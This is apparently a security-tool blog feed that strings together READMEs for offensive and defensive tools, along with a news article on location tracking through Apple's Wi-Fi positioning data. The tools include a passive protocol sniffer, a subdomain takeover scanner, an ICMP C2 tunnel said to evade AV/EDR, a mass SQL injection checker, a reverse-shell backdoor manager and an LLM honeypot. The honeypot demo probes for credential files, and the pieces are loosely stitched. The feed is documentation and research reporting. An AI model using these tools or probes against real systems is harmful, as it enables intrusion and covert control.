    One particular limitation that is bugging me is that the DNS resolver would not return all the IPs for a domain. So it is necessary to make multiple queries to get all (or most) of the IPs. But then again, it is not possible to know how many IPs are there for a domain. I still have to come up with a solution for this. Also, nim-ndns doesn't support CNAME records. So, if a domain has a CNAME record, it will not be resolved. I am waiting for a response from the author for this.

    For now, bruteforcing is skipped if a possible wildcard subdomain is found. This is because, if a domain has a wildcard subdomain, bruteforcing will resolve IPv4 for all possible subdomains. However, this will skip valid subdomains also (i.e. scanme.nmap.org will be skipped even though it's not a wildcard value). I will add a --force-brute | -fb flag later to force bruteforcing.

    Similar thing is true for VHost enumeration for subdomain inputs. Since, urls that ends with given subdomains are returned, subdomains of similar domains are not considered. For example, scannme.nmap.org will not be printed for ack.nmap.org but something.ack.nmap.org might be. I can search for all subdomains of nmap.org but that defeats the purpose of having a subdomains as an input.

    License

    MIT License. See LICENSE for full text.



    Above - Invisible Network Protocol Sniffer

    By: Zion3R


    Invisible protocol sniffer for finding vulnerabilities in the network. Designed for pentesters and security engineers.


    Above: Invisible network protocol sniffer
    Designed for pentesters and security engineers

    Author: Magama Bazarov, <caster@exploit.org>
    Pseudonym: Caster
    Version: 2.6
    Codename: Introvert

    Disclaimer

    All information contained in this repository is provided for educational and research purposes only. The author is not responsible for any illegal use of this tool.

    It is a specialized network security tool that helps both pentesters and security professionals.

    Mechanics

    Above is a invisible network sniffer for finding vulnerabilities in network equipment. It is based entirely on network traffic analysis, so it does not make any noise on the air. He's invisible. Completely based on the Scapy library.

    Above allows pentesters to automate the process of finding vulnerabilities in network hardware. Discovery protocols, dynamic routing, 802.1Q, ICS Protocols, FHRP, STP, LLMNR/NBT-NS, etc.

    Supported protocols

    Detects up to 27 protocols:

    MACSec (802.1X AE)
    EAPOL (Checking 802.1X versions)
    ARP (Passive ARP, Host Discovery)
    CDP (Cisco Discovery Protocol)
    DTP (Dynamic Trunking Protocol)
    LLDP (Link Layer Discovery Protocol)
    802.1Q Tags (VLAN)
    S7COMM (Siemens)
    OMRON
    TACACS+ (Terminal Access Controller Access Control System Plus)
    ModbusTCP
    STP (Spanning Tree Protocol)
    OSPF (Open Shortest Path First)
    EIGRP (Enhanced Interior Gateway Routing Protocol)
    BGP (Border Gateway Protocol)
    VRRP (Virtual Router Redundancy Protocol)
    HSRP (Host Standby Redundancy Protocol)
    GLBP (Gateway Load Balancing Protocol)
    IGMP (Internet Group Management Protocol)
    LLMNR (Link Local Multicast Name Resolution)
    NBT-NS (NetBIOS Name Service)
    MDNS (Multicast DNS)
    DHCP (Dynamic Host Configuration Protocol)
    DHCPv6 (Dynamic Host Configuration Protocol v6)
    ICMPv6 (Internet Control Message Protocol v6)
    SSDP (Simple Service Discovery Protocol)
    MNDP (MikroTik Neighbor Discovery Protocol)

    Operating Mechanism

    Above works in two modes:

    • Hot mode: Sniffing on your interface specifying a timer
    • Cold mode: Analyzing traffic dumps

    The tool is very simple in its operation and is driven by arguments:

    • Interface: Specifying the network interface on which sniffing will be performed
    • Timer: Time during which traffic analysis will be performed
    • Input: The tool takes an already prepared .pcap as input and looks for protocols in it
    • Output: Above will record the listened traffic to .pcap file, its name you specify yourself
    • Passive ARP: Detecting hosts in a segment using Passive ARP
    usage: above.py [-h] [--interface INTERFACE] [--timer TIMER] [--output OUTPUT] [--input INPUT] [--passive-arp]

    options:
    -h, --help show this help message and exit
    --interface INTERFACE
    Interface for traffic listening
    --timer TIMER Time in seconds to capture packets, if not set capture runs indefinitely
    --output OUTPUT File name where the traffic will be recorded
    --input INPUT File name of the traffic dump
    --passive-arp Passive ARP (Host Discovery)

    Information about protocols

    The information obtained will be useful not only to the pentester, but also to the security engineer, he will know what he needs to pay attention to.

    When Above detects a protocol, it outputs the necessary information to indicate the attack vector or security issue:

    • Impact: What kind of attack can be performed on this protocol;

    • Tools: What tool can be used to launch an attack;

    • Technical information: Required information for the pentester, sender MAC/IP addresses, FHRP group IDs, OSPF/EIGRP domains, etc.

    • Mitigation: Recommendations for fixing the security problems

    • Source/Destination Addresses: For protocols, Above displays information about the source and destination MAC addresses and IP addresses


    Installation

    Linux

    You can install Above directly from the Kali Linux repositories

    caster@kali:~$ sudo apt update && sudo apt install above

    Or...

    caster@kali:~$ sudo apt-get install python3-scapy python3-colorama python3-setuptools
    caster@kali:~$ git clone https://github.com/casterbyte/Above
    caster@kali:~$ cd Above/
    caster@kali:~/Above$ sudo python3 setup.py install

    macOS:

    # Install python3 first
    brew install python3
    # Then install required dependencies
    sudo pip3 install scapy colorama setuptools

    # Clone the repo
    git clone https://github.com/casterbyte/Above
    cd Above/
    sudo python3 setup.py install

    Don't forget to deactivate your firewall on macOS!

    Settings > Network > Firewall


    How to Use

    Hot mode

    Above requires root access for sniffing

    Above can be run with or without a timer:

    caster@kali:~$ sudo above --interface eth0 --timer 120

    To stop traffic sniffing, press CTRL + С

    WARNING! Above is not designed to work with tunnel interfaces (L3) due to the use of filters for L2 protocols. Tool on tunneled L3 interfaces may not work properly.

    Example:

    caster@kali:~$ sudo above --interface eth0 --timer 120

    -----------------------------------------------------------------------------------------
    [+] Start sniffing...

    [*] After the protocol is detected - all necessary information about it will be displayed
    --------------------------------------------------
    [+] Detected SSDP Packet
    [*] Attack Impact: Potential for UPnP Device Exploitation
    [*] Tools: evil-ssdp
    [*] SSDP Source IP: 192.168.0.251
    [*] SSDP Source MAC: 02:10:de:64:f2:34
    [*] Mitigation: Ensure UPnP is disabled on all devices unless absolutely necessary, monitor UPnP traffic
    --------------------------------------------------
    [+] Detected MDNS Packet
    [*] Attack Impact: MDNS Spoofing, Credentials Interception
    [*] Tools: Responder
    [*] MDNS Spoofing works specifically against Windows machines
    [*] You cannot get NetNTLMv2-SSP from Apple devices
    [*] MDNS Speaker IP: fe80::183f:301c:27bd:543
    [*] MDNS Speaker MAC: 02:10:de:64:f2:34
    [*] Mitigation: Filter MDNS traffic. Be careful with MDNS filtering
    --------------------------------------------------

    If you need to record the sniffed traffic, use the --output argument

    caster@kali:~$ sudo above --interface eth0 --timer 120 --output above.pcap

    If you interrupt the tool with CTRL+C, the traffic is still written to the file

    Cold mode

    If you already have some recorded traffic, you can use the --input argument to look for potential security issues

    caster@kali:~$ above --input ospf-md5.cap

    Example:

    caster@kali:~$ sudo above --input ospf-md5.cap

    [+] Analyzing pcap file...

    --------------------------------------------------
    [+] Detected OSPF Packet
    [+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
    [*] Tools: Loki, Scapy, FRRouting
    [*] OSPF Area ID: 0.0.0.0
    [*] OSPF Neighbor IP: 10.0.0.1
    [*] OSPF Neighbor MAC: 00:0c:29:dd:4c:54
    [!] Authentication: MD5
    [*] Tools for bruteforce: Ettercap, John the Ripper
    [*] OSPF Key ID: 1
    [*] Mitigation: Enable passive interfaces, use authentication
    --------------------------------------------------
    [+] Detected OSPF Packet
    [+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
    [*] Tools: Loki, Scapy, FRRouting
    [*] OSPF Area ID: 0.0.0.0
    [*] OSPF Neighbor IP: 192.168.0.2
    [*] OSPF Neighbor MAC: 00:0c:29:43:7b:fb
    [!] Authentication: MD5
    [*] Tools for bruteforce: Ettercap, John the Ripper
    [*] OSPF Key ID: 1
    [*] Mitigation: Enable passive interfaces, use authentication

    Passive ARP

    The tool can detect hosts without noise in the air by processing ARP frames in passive mode

    caster@kali:~$ sudo above --interface eth0 --passive-arp --timer 10

    [+] Host discovery using Passive ARP

    --------------------------------------------------
    [+] Detected ARP Reply
    [*] ARP Reply for IP: 192.168.1.88
    [*] MAC Address: 00:00:0c:07:ac:c8
    --------------------------------------------------
    [+] Detected ARP Reply
    [*] ARP Reply for IP: 192.168.1.40
    [*] MAC Address: 00:0c:29:c5:82:81
    --------------------------------------------------

    Outro

    I wrote this tool because of the track "A View From Above (Remix)" by KOAN Sound. This track was everything to me when I was working on this sniffer.




    Why Your Wi-Fi Router Doubles as an Apple AirTag

    Image: Shutterstock.

    Apple and the satellite-based broadband service Starlink each recently took steps to address new research into the potential security and privacy implications of how their services geo-locate devices. Researchers from the University of Maryland say they relied on publicly available data from Apple to track the location of billions of devices globally — including non-Apple devices like Starlink systems — and found they could use this data to monitor the destruction of Gaza, as well as the movements and in many cases identities of Russian and Ukrainian troops.

    At issue is the way that Apple collects and publicly shares information about the precise location of all Wi-Fi access points seen by its devices. Apple collects this location data to give Apple devices a crowdsourced, low-power alternative to constantly requesting global positioning system (GPS) coordinates.

    Both Apple and Google operate their own Wi-Fi-based Positioning Systems (WPS) that obtain certain hardware identifiers from all wireless access points that come within range of their mobile devices. Both record the Media Access Control (MAC) address that a Wi-FI access point uses, known as a Basic Service Set Identifier or BSSID.

    Periodically, Apple and Google mobile devices will forward their locations — by querying GPS and/or by using cellular towers as landmarks — along with any nearby BSSIDs. This combination of data allows Apple and Google devices to figure out where they are within a few feet or meters, and it’s what allows your mobile phone to continue displaying your planned route even when the device can’t get a fix on GPS.

    With Google’s WPS, a wireless device submits a list of nearby Wi-Fi access point BSSIDs and their signal strengths — via an application programming interface (API) request to Google — whose WPS responds with the device’s computed position. Google’s WPS requires at least two BSSIDs to calculate a device’s approximate position.

    Apple’s WPS also accepts a list of nearby BSSIDs, but instead of computing the device’s location based off the set of observed access points and their received signal strengths and then reporting that result to the user, Apple’s API will return the geolocations of up to 400 hundred more BSSIDs that are nearby the one requested. It then uses approximately eight of those BSSIDs to work out the user’s location based on known landmarks.

    In essence, Google’s WPS computes the user’s location and shares it with the device. Apple’s WPS gives its devices a large enough amount of data about the location of known access points in the area that the devices can do that estimation on their own.

    That’s according to two researchers at the University of Maryland, who theorized they could use the verbosity of Apple’s API to map the movement of individual devices into and out of virtually any defined area of the world. The UMD pair said they spent a month early in their research continuously querying the API, asking it for the location of more than a billion BSSIDs generated at random.

    They learned that while only about three million of those randomly generated BSSIDs were known to Apple’s Wi-Fi geolocation API, Apple also returned an additional 488 million BSSID locations already stored in its WPS from other lookups.

    UMD Associate Professor David Levin and Ph.D student Erik Rye found they could mostly avoid requesting unallocated BSSIDs by consulting the list of BSSID ranges assigned to specific device manufacturers. That list is maintained by the Institute of Electrical and Electronics Engineers (IEEE), which is also sponsoring the privacy and security conference where Rye is slated to present the UMD research later today.

    Plotting the locations returned by Apple’s WPS between November 2022 and November 2023, Levin and Rye saw they had a near global view of the locations tied to more than two billion Wi-Fi access points. The map showed geolocated access points in nearly every corner of the globe, apart from almost the entirety of China, vast stretches of desert wilderness in central Australia and Africa, and deep in the rainforests of South America.

    A “heatmap” of BSSIDs the UMD team said they discovered by guessing randomly at BSSIDs.

    The researchers said that by zeroing in on or “geofencing” other smaller regions indexed by Apple’s location API, they could monitor how Wi-Fi access points moved over time. Why might that be a big deal? They found that by geofencing active conflict zones in Ukraine, they were able to determine the location and movement of Starlink devices used by both Ukrainian and Russian forces.

    The reason they were able to do that is that each Starlink terminal — the dish and associated hardware that allows a Starlink customer to receive Internet service from a constellation of orbiting Starlink satellites — includes its own Wi-Fi access point, whose location is going to be automatically indexed by any nearby Apple devices that have location services enabled.

    A heatmap of Starlink routers in Ukraine. Image: UMD.

    The University of Maryland team geo-fenced various conflict zones in Ukraine, and identified at least 3,722 Starlink terminals geolocated in Ukraine.

    “We find what appear to be personal devices being brought by military personnel into war zones, exposing pre-deployment sites and military positions,” the researchers wrote. “Our results also show individuals who have left Ukraine to a wide range of countries, validating public reports of where Ukrainian refugees have resettled.”

    In an interview with KrebsOnSecurity, the UMD team said they found that in addition to exposing Russian troop pre-deployment sites, the location data made it easy to see where devices in contested regions originated from.

    “This includes residential addresses throughout the world,” Levin said. “We even believe we can identify people who have joined the Ukraine Foreign Legion.”

    A simplified map of where BSSIDs that enter the Donbas and Crimea regions of Ukraine originate. Image: UMD.

    Levin and Rye said they shared their findings with Starlink in March 2024, and that Starlink told them the company began shipping software updates in 2023 that force Starlink access points to randomize their BSSIDs.

    Starlink’s parent SpaceX did not respond to requests for comment. But the researchers shared a graphic they said was created from their Starlink BSSID monitoring data, which shows that just in the past month there was a substantial drop in the number of Starlink devices that were geo-locatable using Apple’s API.

    UMD researchers shared this graphic, which shows their ability to monitor the location and movement of Starlink devices by BSSID dropped precipitously in the past month.

    They also shared a written statement they received from Starlink, which acknowledged that Starlink User Terminal routers originally used a static BSSID/MAC:

    “In early 2023 a software update was released that randomized the main router BSSID. Subsequent software releases have included randomization of the BSSID of WiFi repeaters associated with the main router. Software updates that include the repeater randomization functionality are currently being deployed fleet-wide on a region-by-region basis. We believe the data outlined in your paper is based on Starlink main routers and or repeaters that were queried prior to receiving these randomization updates.”

    The researchers also focused their geofencing on the Israel-Hamas war in Gaza, and were able to track the migration and disappearance of devices throughout the Gaza Strip as Israeli forces cut power to the country and bombing campaigns knocked out key infrastructure.

    “As time progressed, the number of Gazan BSSIDs that are geolocatable continued to decline,” they wrote. “By the end of the month, only 28% of the original BSSIDs were still found in the Apple WPS.”

    In late March 2024, Apple quietly updated its website to note that anyone can opt out of having the location of their wireless access points collected and shared by Apple — by appending “_nomap” to the end of the Wi-Fi access point’s name (SSID). Adding “_nomap” to your Wi-Fi network name also blocks Google from indexing its location.

    Apple updated its privacy and location services policy in March 2024 to allow people to opt out of having their Wi-Fi access point indexed by its service, by appending “_nomap” to the network’s name.

    Asked about the changes, Apple said they have respected the “_nomap” flag on SSIDs for some time, but that this was only called out in a support article earlier this year.

    Rye said Apple’s response addressed the most depressing aspect of their research: That there was previously no way for anyone to opt out of this data collection.

    “You may not have Apple products, but if you have an access point and someone near you owns an Apple device, your BSSID will be in [Apple’s] database,” he said. “What’s important to note here is that every access point is being tracked, without opting in, whether they run an Apple device or not. Only after we disclosed this to Apple have they added the ability for people to opt out.”

    The researchers said they hope Apple will consider additional safeguards, such as proactive ways to limit abuses of its location API.

    “It’s a good first step,” Levin said of Apple’s privacy update in March. “But this data represents a really serious privacy vulnerability. I would hope Apple would put further restrictions on the use of its API, like rate-limiting these queries to keep people from accumulating massive amounts of data like we did.”

    The UMD researchers said they omitted certain details from their study to protect the users they were able to track, noting that the methods they used could present risks for those fleeing abusive relationships or stalkers.

    “We observe routers move between cities and countries, potentially representing their owner’s relocation or a business transaction between an old and new owner,” they wrote. “While there is not necessarily a 1-to-1 relationship between Wi-Fi routers and users, home routers typically only have several. If these users are vulnerable populations, such as those fleeing intimate partner violence or a stalker, their router simply being online can disclose their new location.”

    The researchers said Wi-Fi access points that can be created using a mobile device’s built-in cellular modem do not create a location privacy risk for their users because mobile phone hotspots will choose a random BSSID when activated.

    “Modern Android and iOS devices will choose a random BSSID when you go into hotspot mode,” he said. “Hotspots are already implementing the strongest recommendations for privacy protections. It’s other types of devices that don’t do that.”

    For example, they discovered that certain commonly used travel routers compound the potential privacy risks.

    “Because travel routers are frequently used on campers or boats, we see a significant number of them move between campgrounds, RV parks, and marinas,” the UMD duo wrote. “They are used by vacationers who move between residential dwellings and hotels. We have evidence of their use by military members as they deploy from their homes and bases to war zones.”

    A copy of the UMD research is available here (PDF).

    Update, May 22, 4:54 p.m. ET: Added response from Apple.

    Five Core Tenets Of Highly Effective DevSecOps Practices

    One of the enduring challenges of building modern applications is to make them more secure without disrupting high-velocity DevOps processes or degrading the developer experience. Today’s cyber threat landscape is rife with sophisticated attacks aimed at all different parts of the software supply chain and the urgency for software-producing organizations to adopt DevSecOps practices that deeply

    Subhunter - A Fast Subdomain Takeover Tool

    By: Zion3R


    Subdomain takeover is a common vulnerability that allows an attacker to gain control over a subdomain of a target domain and redirect users intended for an organization's domain to a website that performs malicious activities, such as phishing campaigns, stealing user cookies, etc. It occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a CNAME in the DNS, but no host is providing content for it. Subhunter takes a given list of Subdomains" title="Subdomains">subdomains and scans them to check this vulnerability.


    Features:

    • Auto update
    • Uses random user agents
    • Built in Go
    • Uses a fork of fingerprint data from well known sources (can-i-take-over-xyz)

    Installation:

    Option 1:

    Download from releases

    Option 2:

    Build from source:

    $ git clone https://github.com/Nemesis0U/Subhunter.git
    $ go build subhunter.go

    Usage:

    Options:

    Usage of subhunter:
    -l string
    File including a list of hosts to scan
    -o string
    File to save results
    -t int
    Number of threads for scanning (default 50)
    -timeout int
    Timeout in seconds (default 20)

    Demo (Added fake fingerprint for POC):

    ./Subhunter -l subdomains.txt -o test.txt

    ____ _ _ _
    / ___| _ _ | |__ | |__ _ _ _ __ | |_ ___ _ __
    \___ \ | | | | | '_ \ | '_ \ | | | | | '_ \ | __| / _ \ | '__|
    ___) | | |_| | | |_) | | | | | | |_| | | | | | | |_ | __/ | |
    |____/ \__,_| |_.__/ |_| |_| \__,_| |_| |_| \__| \___| |_|


    A fast subdomain takeover tool

    Created by Nemesis

    Loaded 88 fingerprints for current scan

    -----------------------------------------------------------------------------

    [+] Nothing found at www.ubereats.com: Not Vulnerable
    [+] Nothing found at testauth.ubereats.com: Not Vulnerable
    [+] Nothing found at apple-maps-app-clip.ubereats.com: Not Vulnerable
    [+] Nothing found at about.ubereats.com: Not Vulnerable
    [+] Nothing found at beta.ubereats.com: Not Vulnerable
    [+] Nothing found at ewp.ubereats.com: Not Vulnerable
    [+] Nothi ng found at edgetest.ubereats.com: Not Vulnerable
    [+] Nothing found at guest.ubereats.com: Not Vulnerable
    [+] Google Cloud: Possible takeover found at testauth.ubereats.com: Vulnerable
    [+] Nothing found at info.ubereats.com: Not Vulnerable
    [+] Nothing found at learn.ubereats.com: Not Vulnerable
    [+] Nothing found at merchants.ubereats.com: Not Vulnerable
    [+] Nothing found at guest-beta.ubereats.com: Not Vulnerable
    [+] Nothing found at merchant-help.ubereats.com: Not Vulnerable
    [+] Nothing found at merchants-beta.ubereats.com: Not Vulnerable
    [+] Nothing found at merchants-staging.ubereats.com: Not Vulnerable
    [+] Nothing found at messages.ubereats.com: Not Vulnerable
    [+] Nothing found at order.ubereats.com: Not Vulnerable
    [+] Nothing found at restaurants.ubereats.com: Not Vulnerable
    [+] Nothing found at payments.ubereats.com: Not Vulnerable
    [+] Nothing found at static.ubereats.com: Not Vulnerable

    Subhunter exiting...
    Results written to test.txt




    PingRAT - Secretly Passes C2 Traffic Through Firewalls Using ICMP Payloads

    By: Zion3R


    PingRAT secretly passes C2 traffic through firewalls using ICMP payloads.

    Features:

    • Uses ICMP for Command and Control
    • Undetectable by most AV/EDR solutions
    • Written in Go

    Installation:

    Download the binaries

    or build the binaries and you are ready to go:

    $ git clone https://github.com/Nemesis0U/PingRAT.git
    $ go build client.go
    $ go build server.go

    Usage:

    Server:

    ./server -h
    Usage of ./server:
    -d string
    Destination IP address
    -i string
    Listener (virtual) Network Interface (e.g. eth0)

    Client:

    ./client -h
    Usage of ./client:
    -d string
    Destination IP address
    -i string
    (Virtual) Network Interface (e.g., eth0)



    SQLMC - Check All Urls Of A Domain For SQL Injections

    By: Zion3R


    SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.

    Features

    • Scans a domain for SQL injection vulnerabilities
    • Crawls the given URL up to a specified depth
    • Checks each link for SQL injection vulnerabilities
    • Reports vulnerabilities along with server information and depth

    Installation

    1. Install the required dependencies: bash pip3 install sqlmc

    Usage

    Run sqlmc with the following command-line arguments:

    • -u, --url: The URL to scan (required)
    • -d, --depth: The depth to scan (required)
    • -o, --output: The output file to save the results

    Example usage:

    sqlmc -u http://example.com -d 2

    Replace http://example.com with the URL you want to scan and 3 with the desired depth of the scan. You can also specify an output file using the -o or --output flag followed by the desired filename.

    The tool will then perform the scan and display the results.

    ToDo

    • Check for multiple GET params
    • Better injection checker trigger methods

    Credits

    License

    This project is licensed under the GNU Affero General Public License v3.0.



    C2-Cloud - The C2 Cloud Is A Robust Web-Based C2 Framework, Designed To Simplify The Life Of Penetration Testers

    By: Zion3R


    The C2 Cloud is a robust web-based C2 framework, designed to simplify the life of penetration testers. It allows easy access to compromised backdoors, just like accessing an EC2 instance in the AWS cloud. It can manage several simultaneous backdoor sessions with a user-friendly interface.

    C2 Cloud is open source. Security analysts can confidently perform simulations, gaining valuable experience and contributing to the proactive defense posture of their organizations.

    Reverse shells support:

    1. Reverse TCP
    2. Reverse HTTP
    3. Reverse HTTPS (configure it behind an LB)
    4. Telegram C2

    Demo

    C2 Cloud walkthrough: https://youtu.be/hrHT_RDcGj8
    Ransomware simulation using C2 Cloud: https://youtu.be/LKaCDmLAyvM
    Telegram C2: https://youtu.be/WLQtF4hbCKk

    Key Features

    🔒 Anywhere Access: Reach the C2 Cloud from any location.
    🔄 Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
    🖱️ One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
    📜 Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.

    Tech Stack

    🛠️ Flask: Serving web and API traffic, facilitating reverse HTTP(s) requests.
    🔗 TCP Socket: Serving reverse TCP requests for enhanced functionality.
    🌐 Nginx: Effortlessly routing traffic between web and backend systems.
    📨 Redis PubSub: Serving as a robust message broker for seamless communication.
    🚀 Websockets: Delivering real-time updates to browser clients for enhanced user experience.
    💾 Postgres DB: Ensuring persistent storage for seamless continuity.

    Architecture

    Application setup

    • Management port: 9000
    • Reversse HTTP port: 8000
    • Reverse TCP port: 8888

    • Clone the repo

    • Optional: Update chait_id, bot_token in c2-telegram/config.yml
    • Execute docker-compose up -d to start the containers Note: The c2-api service will not start up until the database is initialized. If you receive 500 errors, please try after some time.

    Credits

    Inspired by Villain, a CLI-based C2 developed by Panagiotis Chartas.

    License

    Distributed under the MIT License. See LICENSE for more information.

    Contact



    Galah - An LLM-powered Web Honeypot Using The OpenAI API

    By: Zion3R


    TL;DR: Galah (/ɡəˈlɑː/ - pronounced 'guh-laa') is an LLM (Large Language Model) powered web honeypot, currently compatible with the OpenAI API, that is able to mimic various applications and dynamically respond to arbitrary HTTP requests.


    Description

    Named after the clever Australian parrot known for its mimicry, Galah mirrors this trait in its functionality. Unlike traditional web honeypots that rely on a manual and limiting method of emulating numerous web applications or vulnerabilities, Galah adopts a novel approach. This LLM-powered honeypot mimics various web applications by dynamically crafting relevant (and occasionally foolish) responses, including HTTP headers and body content, to arbitrary HTTP requests. Fun fact: in Aussie English, Galah also means fool!

    I've deployed a cache for the LLM-generated responses (the cache duration can be customized in the config file) to avoid generating multiple responses for the same request and to reduce the cost of the OpenAI API. The cache stores responses per port, meaning if you probe a specific port of the honeypot, the generated response won't be returned for the same request on a different port.

    The prompt is the most crucial part of this honeypot! You can update the prompt in the config file, but be sure not to change the part that instructs the LLM to generate the response in the specified JSON format.

    Note: Galah was a fun weekend project I created to evaluate the capabilities of LLMs in generating HTTP messages, and it is not intended for production use. The honeypot may be fingerprinted based on its response time, non-standard, or sometimes weird responses, and other network-based techniques. Use this tool at your own risk, and be sure to set usage limits for your OpenAI API.

    Future Enhancements

    • Rule-Based Response: The new version of Galah will employ a dynamic, rule-based approach, adding more control over response generation. This will further reduce OpenAI API costs and increase the accuracy of the generated responses.

    • Response Database: It will enable you to generate and import a response database. This ensures the honeypot only turns to the OpenAI API for unknown or new requests. I'm also working on cleaning up and sharing my own database.

    • Support for Other LLMs.

    Getting Started

    • Ensure you have Go version 1.20+ installed.
    • Create an OpenAI API key from here.
    • If you want to serve over HTTPS, generate TLS certificates.
    • Clone the repo and install the dependencies.
    • Update the config.yaml file.
    • Build and run the Go binary!
    % git clone git@github.com:0x4D31/galah.git
    % cd galah
    % go mod download
    % go build
    % ./galah -i en0 -v

    ██████ █████ ██ █████ ██ ██
    ██ ██ ██ ██ ██ ██ ██ ██
    ██ ███ ███████ ██ ███████ ███████
    ██ ██ ██ ██ ██ ██ ██ ██ ██
    ██████ ██ ██ ███████ ██ ██ ██ ██
    llm-based web honeypot // version 1.0
    author: Adel "0x4D31" Karimi

    2024/01/01 04:29:10 Starting HTTP server on port 8080
    2024/01/01 04:29:10 Starting HTTP server on port 8888
    2024/01/01 04:29:10 Starting HTTPS server on port 8443 with TLS profile: profile1_selfsigned
    2024/01/01 04:29:10 Starting HTTPS server on port 443 with TLS profile: profile1_selfsigned

    2024/01/01 04:35:57 Received a request for "/.git/config" from [::1]:65434
    2024/01/01 04:35:57 Request cache miss for "/.git/config": Not found in cache
    2024/01/01 04:35:59 Generated HTTP response: {"Headers": {"Content-Type": "text/plain", "Server": "Apache/2.4.41 (Ubuntu)", "Status": "403 Forbidden"}, "Body": "Forbidden\nYou don't have permission to access this resource."}
    2024/01/01 04:35:59 Sending the crafted response to [::1]:65434

    ^C2024/01/01 04:39:27 Received shutdown signal. Shutting down servers...
    2024/01/01 04:39:27 All servers shut down gracefully.

    Example Responses

    Here are some example responses:

    Example 1

    % curl http://localhost:8080/login.php
    <!DOCTYPE html><html><head><title>Login Page</title></head><body><form action='/submit.php' method='post'><label for='uname'><b>Username:</b></label><br><input type='text' placeholder='Enter Username' name='uname' required><br><label for='psw'><b>Password:</b></label><br><input type='password' placeholder='Enter Password' name='psw' required><br><button type='submit'>Login</button></form></body></html>

    JSON log record:

    {"timestamp":"2024-01-01T05:38:08.854878","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"51978","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/login.php","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Content-Type":"text/html","Server":"Apache/2.4.38"},"body":"\u003c!DOCTYPE html\u003e\u003chtml\u003e\u003chead\u003e\u003ctitle\u003eLogin Page\u003c/title\u003e\u003c/head\u003e\u003cbody\u003e\u003cform action='/submit.php' method='post'\u003e\u003clabel for='uname'\u003e\u003cb\u003eUsername:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='text' placeholder='Enter Username' name='uname' required\u003e\u003cbr\u003e\u003clabel for='psw'\u003e\u003cb\u003ePassword:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='password' placeholder='Enter Password' name='psw' required\u003e\u003cbr\u003e\u003cbutton type='submit'\u003eLogin\u003c/button\u003e\u003c/form\u003e\u003c/body\u003e\u003c/html\u003e"}}

    Example 2

    % curl http://localhost:8080/.aws/credentials
    [default]
    aws_access_key_id = AKIAIOSFODNN7EXAMPLE
    aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
    region = us-west-2

    JSON log record:

    {"timestamp":"2024-01-01T05:40:34.167361","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"65311","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/.aws/credentials","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Encoding":"gzip","Content-Length":"126","Content-Type":"text/plain","Server":"Apache/2.4.51 (Unix)"},"body":"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\naws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nregion = us-west-2"}}

    Okay, that was impressive!

    Example 3

    Now, let's do some sort of adversarial testing!

    % curl http://localhost:8888/are-you-a-honeypot
    No, I am a server.`

    JSON log record:

    {"timestamp":"2024-01-01T05:50:43.792479","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"61982","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/are-you-a-honeypot","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Length":"20","Content-Type":"text/plain","Server":"Apache/2.4.41 (Ubuntu)"},"body":"No, I am a server."}}

    😑

    % curl http://localhost:8888/i-mean-are-you-a-fake-server`
    No, I am not a fake server.

    JSON log record:

    {"timestamp":"2024-01-01T05:51:40.812831","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"62205","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/i-mean-are-you-a-fake-server","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Type":"text/plain","Server":"LocalHost/1.0"},"body":"No, I am not a fake server."}}

    You're a galah, mate!



    Url-Status-Checker - Tool For Swiftly Checking The Status Of URLs

    By: Zion3R



    Status Checker is a Python script that checks the status of one or multiple URLs/domains and categorizes them based on their HTTP status codes. Version 1.0.0 Created BY BLACK-SCORP10 t.me/BLACK-SCORP10

    Features

    • Check the status of single or multiple URLs/domains.
    • Asynchronous HTTP requests for improved performance.
    • Color-coded output for better visualization of status codes.
